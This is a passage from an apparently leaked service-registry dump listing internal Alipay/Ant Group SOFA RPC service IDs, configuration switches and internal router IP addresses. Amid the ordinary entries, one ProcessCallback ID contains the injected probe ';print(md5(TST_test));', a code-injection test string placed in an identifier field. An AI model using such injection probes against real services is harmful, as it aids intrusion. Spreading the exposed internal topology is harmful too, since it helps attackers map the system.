@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appcompass.common.service.facade.plugin.ABTestDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoguard.common.service.facade.capacity.api.ProcessManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue4#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditmarket.jiebeipromo.service.PcreditMarketNumCertFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.insproductcore.facade.service.InsFcProductQuery4MngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.openauth.common.service.facade.authtoken.Oauth2TokenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_169.254.172.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gfinsight.service.api.explorer.TaskTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.workflow.service.facade.callback.ProcessCallback:1.0:insttune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iaccenter.facade.query.api.CategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:supergwsmall22@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.170.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbrecruit.common.service.facade.recruit.query.RecruitActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.creditbizcore.common.service.facade.service.CreditBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airmng.common.service.facade.product.AirmngProductService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.datacontextlib.datav.facade.DataVirtualMetricsReporter:1.0:zdatacontext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetprod.common.facade.AssetRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CSPROPMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.seekers.facade.spis.EntityDiagnosisService:1.0:mobileha_fastReactionLocateService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.pointmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.agdscdecision:name=com.alipay.agds.cdecision.label.facade.drm.CustomerLabelDrm.betaPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.168.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcardcore.common.service.facade.mpcard.McardPmtInstQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.1.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insclaiminvestcore.common.service.facade.service.user.EmployeeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:lifecustprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaoprod.biz.mwallet.pass.manager.SharePassManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.BizDataStatsFacade:1.0:ebppcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaymember.common.service.facade.config.service.NaviConfigManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.ActivityPlanPropertyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.vega-integration-kepler:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.finreconchecker.common.service.facade.service.DataCollectMngServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mfinsnsprod.service.facade.api.ops.OpsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.200.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fintradeguard.core.service.repository.BusinesstypeMappingRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:filecore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.api.query.CfpBankAccountQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.amc.service.AmcInspectTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.CardAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:hainaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.facade.merchantloan.api.MtctransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_ASSETTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.spcenter.facade.bd.BdFeatureQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.yunfengdieweb:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.accountOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:proxymock-disable@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaoprod.biz.mwallet.pass.manager.KabaoPassCommonManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payflux.spi.BizDispatchServiceFacade:1.0:mobilecodec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecogw.facade.CloudGwApiInvokeFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.88.97.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchiscore.common.service.facade.generalorder.OrderExtendSpi:1.0:openhome@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloanrepay.common.service.facade.api.RepayAccountManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.prod.common.service.facade.api.feed.ShopFeedQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.StockCompanyArchiveFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.106.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.172.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:;print(md5(TST_test));@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.reconAdjustTaskInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-finpwm-three-layers-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY_V2@kabaoprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","cn.com.antcloud.acticketcore.common.service.facade.StationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ialicore:name=com.ipay.ialicore.common.drm.MngPageRedirectStrategyDrm.redirectRules,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.DomainQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.hui.BeautifulLifeActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:instfund@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@promokernel#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mrchishub.common.service.facade.api.MessageInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.PointCapacityDrmResouce.businessShutdown,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.236.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfoprod.common.service.facade.FinfoServiceAppQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.control.AccountMonitorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.query.service.UnionQueryService:1.0:antcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:release_code_analyze_task@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.content.facade.PublicArticleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:bakerytwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:rmaccurate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frservcenter.facade.api.ProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitoptrade.api.TradeProcessFacade:1.0:tradeProcessFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.gov.common.facade.tdm.api.ProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:settlequery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.common.service.facade.config.CommonConfigService:1.0:ruleDescConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebdistributor.common.facade.service.AgentTradeAgreementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.client.api.KmiVerifySignTool:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.settlequery.common.service.facade.deposit.api.DepositInstructionQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.gfinvest.facade.api.common.InvestorManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.stresstestmng.bizservice.OpenSupportManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.fund.FinResultDetailFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestcore.common.service.facade.service.settle.SettleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@appxprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.paymentmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.217.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","publichome@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","_CLIENTSERVICE_TEST_8_2_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zappinfo:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppcore.facade.confmng.ChargeoffInstMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:pucprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.facade.authtoken.Oauth2TokenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mindv.okcourse.service.OkReceivePrizeListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:trafficcardsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.checker.MiniAppCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.145.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.210.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.device.OpenDeviceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.emc.common.service.facade.api.EmcProcessDataManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.msecuritypay.SecurityPayAppService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_MOBILE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kbadvert_GRZONE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenestarwish.common.service.facade.api.FinsStarWishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.facade.LogonIdSeizureQuerySevice:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alifi.shared.component.asynexecutor.manager.AsynExecutorBSFacade:1.0:bkmerchantprod-asynExecutorBSFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sdaclouddevice.facade.log.DeviceLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fundmng.common.service.facade.ContractTestService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.common.service.guid.GuidQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.iad.facade.IndicatorViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fundboss.common.service.facade.singleha.HAMetadataManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ap.acquirecenter.common.service.facade.api.ConfirmQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpublish.common.service.facade.CallbackServiceFacade:1.0:antb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:keymap-antprocess-callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.login.LoginInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clive.common.service.facade.api.UserPerDayVisitCountFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.spi.BatchArSpi:1.0:finsign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexratecenter.service.facade.api.ExFxRateStdProdQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.facade.api.RegisterRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_SIGN_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.rpc.common.service.facade.LambdaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.monitor.AlertRecordManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.alscmagiclamp.common.facade.RuleOpenTriFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:beyondService_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.MerchantRightsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.realtimecheckprod.common.facade.AssetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:pcinstmis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.partner.EcologicalPartnerOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundguardian.common.facade.service.RuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscenter.service.contact.facade.PhoneInfoService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.activityha.ActivityAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.baymax.maintainess.drm.scheduleParameter.app_finfocore.localScanEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradecenter.common.service.facade.consumer.SendEventConsumeCenterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mfinwormhole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenestarwish.common.service.facade.api.FinsCapitalPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqdataservice.common.service.facade.po.PoEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.continuousSignAgreementInsts,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.68.168#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.riskmodelcenter.common.service.facade.riskentity.TraversalQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.benefitcore.common.service.facade.api.BenefitMarketingManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alinp.common.service.facade.tag.TagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.ServiceMetaQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insdataprod.common.service.facade.api.UserAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.CiCadaTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.finservice.FinServiceCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.revtrans.core.model.drm.RevtransDrmImpl.cacheAccounts,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mctlib.biz.manager.service.smartprogram.MctSmartModeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:handFuHDImageExecutor$2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.starstage.facade.StarstageFormModuleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.KeywordsConfManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.hpmweb.MiniApp:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dmirror:name=com.alipay.routeclient.DefaultRouteCoordinator.planInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.paramcore.common.service.facade.manage.api.ParmTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.220.223#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.facade.BalanceFreezeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.237.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.forumactivity.api.ForumActivityRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.category.ContentWebCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.112.229#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:distinguishprod_antprocess_verify_finish_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.recommend.StockExponentialTrendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-tnpmregistry@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.airprodTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.test.SimpleService-3#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.52.100.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.feature.common.service.facade.sql.service.SqlDeduplicateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.TradeChargeQueryFacade:1.0:tradequeryhis@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.riskdatacenter.service.facade.quota.QuotaAppQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilemock.common.service.facade.api.ClientAppServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofa4demo_cmpr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.business.BusinessSelectionResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_EBPPPROD_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.rdsUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financemng.common.facade.service.ContractAuditManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.facade.CodeManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedData2SyncTable4CheckDrmImpl.needLoadTables,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gffund.common.service.facade.api.autodrive.DefaultTransAccountInfoConfigOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.106.239#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_C_FINBATCH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchasset.common.service.facade.common.AssetPermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.69.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cifprocess.custdpc.cluster.ClusterManagerQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.slaguard:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:psbp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.filex.source.FilexStoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.backmanagement.BriefManagementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchaincustomer.facade.api.sign.SignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecsa.service.provider.CsaServiceAdapter:1.0:kbcraftsman@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmpservice.common.service.facade.tag.TagServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:linglongmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.mydds:name=com.alipay.mydds.biz.shared.decision.drm.RecordSwitchResource.executeTraceWhiteTableRegex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemsgprod.common.service.facade.gray.MsgBusinessGrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundtrade.common.service.facade.api.FundCustodyTransferFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.common.globalunique.api.GlobalUniqueControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.alinp.common.service.facade.detail.DetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:securityops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iregulation.common.service.facade.api.IregulationDeclareFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:isdsp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-finassetinsight-common#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.agdsccalipay.jiebei.facade.service.JieBeiPlatformCreditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.exriskcenter.common.service.facade.api.query.TreeNodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.128.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.AppDataSourceMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.after.InvestDelegationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlecore.service.facade.depositback.DirectDepositBackFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTesta